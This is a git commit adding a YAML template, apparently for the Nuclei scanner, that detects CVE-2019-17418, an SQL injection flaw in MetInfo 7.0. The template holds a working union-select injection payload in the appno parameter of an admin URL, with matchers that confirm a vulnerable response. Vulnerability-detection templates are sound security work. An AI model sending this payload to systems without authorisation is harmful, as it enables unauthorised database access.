Merge pull request #4148 from ritikchaddha/patch-29

Create CVE-2019-17418.yaml
2022-04-15 16:09:20 +04:00 · 2022-04-15 16:09:20 +04:00 · 9e82c6f530
parent c008477590 2ed1628058
commit 9e82c6f530
1 changed files with 28 additions and 0 deletions
--- a/cves/2019/CVE-2019-17418.yaml
+++ b/cves/2019/CVE-2019-17418.yaml
@ -0,0 +1,28 @@
+id: CVE-2019-17418
+
+info:
+  name: MetInfo 7.0 - SQL Injection
+  author: ritikchaddha
+  severity: high
+  description: An issue was discovered in MetInfo 7.0. There is SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter, a different issue than CVE-2019-16997
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-17418
+  tags: metinfo,sqli,cve,cve2019
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "43865094559"
+
+      - type: status
+        status:
+          - 200